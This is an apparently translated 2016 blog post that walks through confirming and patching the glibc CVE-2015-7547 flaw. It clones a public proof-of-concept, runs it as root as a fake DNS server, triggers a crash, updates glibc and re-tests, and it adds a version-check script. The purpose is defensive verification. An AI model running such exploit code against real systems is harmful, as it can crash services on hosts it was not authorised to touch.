
Steps for confirming the glibc library vulnerability (CVE-2015-7547) by following them from top to bottom

Posted at 2016-02-18

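Overview

Following these steps from top to bottom lets you confirm the vulnerability and remediate it, but this procedure is meant for checking in a test environment.
Do not run it on servers where it would affect service.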

Procedure

### Log in to the test server
$ ssh (target server)

### Clone the PoC code
$ git clone https://github.com/fjserna/CVE-2015-7547.git

### Run the PoC code
$ sudo CVE-2015-7547/CVE-2015-7547-poc.py &

### Configuration for the test
$ sudo cp -ip /etc/resolv.conf /tmp/resolv.conf
$ sudo vi /etc/resolv.conf
================================================
nameserver 127.0.0.1
================================================

### Test
$ ssh www.example.jp
================================================
[UDP] Total Data len recv 32
[UDP] Total Data len recv 32
Connected with 127.0.0.1:50788
[TCP] Total Data len recv 68
[TCP] Request1 len recv 32
[TCP] Request2 len recv 32
セグメンテーション違反です  <- if this (segmentation fault) appears, the host is vulnerable
================================================

### Restore the resolv.conf settings
$ sudo cp -ip /tmp/resolv.conf /etc/resolv.conf

### Update (confirm the version is 2.12-1.166.el6_7.7 or later)
$ sudo yum update glibc

### Reboot the OS
$ sudo shutdown -r now

### Log in
$ ssh (target server)

### Run the PoC code
$ sudo CVE-2015-7547/CVE-2015-7547-poc.py &

### Apply the resolv.conf setting
$ sudo vi /etc/resolv.conf
================================================
nameserver 127.0.0.1
================================================

### Test
$ ssh www.example.jp
================================================
[UDP] Total Data len recv 32
[UDP] Total Data len recv 32
Connected with 127.0.0.1:34103
[TCP] Total Data len recv 68
[TCP] Request1 len recv 32
[TCP] Request2 len recv 32
ssh: Could not resolve hostname www.example.jp: Name or service not known  <- normal output
================================================

### Restore the resolv.conf settings
$ sudo cp -ip /tmp/resolv.conf /etc/resolv.conf

### Stop the PoC code
$ fg
================================================
sudo CVE-2015-7547/CVE-2015-7547-poc.py
================================================
(Press Ctrl + C)
================================================
^CTraceback (most recent call last):
  File "CVE-2015-7547/CVE-2015-7547-poc.py", line 176, in <module>
    tcp_thread()
  File "CVE-2015-7547/CVE-2015-7547-poc.py", line 105, in tcp_thread
    conn, addr = sock_tcp.accept()
  File "/usr/lib64/python2.6/socket.py", line 197, in accept
    sock, addr = self._sock.accept()
KeyboardInterrupt
================================================
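
To check the outcome of the update and reboot steps without running the PoC, the following added example (not part of the original article) compares each installed glibc build with the fixed version-release named above and lists processes that still map the pre-update libc. The function names, the simplified version ordering and the `(deleted)` mapping check are assumptions of this example.

```sh
#!/bin/sh
# Added example, not from the original article.
FIXED="2.12-1.166.el6_7.7"   # fixed version-release named in the article (EL6)

# vr_ge A B: succeed when version-release A >= B. Assumption: simplified
# ordering (not full rpmvercmp); fields split on . _ - and compared as
# integers when both are numeric, otherwise as strings.
vr_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, A, /[._-]/); nb = split(b, B, /[._-]/)
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            if (i > nb) exit 0          # A has extra fields: newer
            if (i > na) exit 1          # B has extra fields: A is older
            if (A[i] ~ /^[0-9]+$/ && B[i] ~ /^[0-9]+$/) {
                if (A[i] + 0 > B[i] + 0) exit 0
                if (A[i] + 0 < B[i] + 0) exit 1
            } else if (A[i] != B[i]) {
                exit ((A[i] > B[i]) ? 0 : 1)
            }
        }
        exit 0
    }'
}

# glibc_status VR: print "fixed" or "vulnerable" for one version-release.
glibc_status() {
    if vr_ge "$1" "$FIXED"; then echo fixed; else echo vulnerable; fi
}

# stale_libc_pids [PROCROOT]: print PIDs whose maps still reference a libc
# file replaced on disk, i.e. processes not restarted since the update.
stale_libc_pids() {
    root=${1:-/proc}
    for m in "$root"/[0-9]*/maps; do
        [ -r "$m" ] || continue
        if grep -q 'libc-[0-9.]*\.so.*(deleted)' "$m" 2>/dev/null; then
            pid=${m%/maps}; echo "${pid##*/}"
        fi
    done
}

# On an RPM host, report every installed glibc build (multilib included).
if command -v rpm >/dev/null 2>&1 && rpm -q glibc >/dev/null 2>&1; then
    rpm -q --qf '%{VERSION}-%{RELEASE} %{ARCH}\n' glibc |
    while read -r vr arch; do
        echo "glibc.$arch $vr: $(glibc_status "$vr")"
    done
    stale_libc_pids
fi
```

Run it as root so that every process's maps file is readable; an empty PID list after the reboot step means no process is still using the old library.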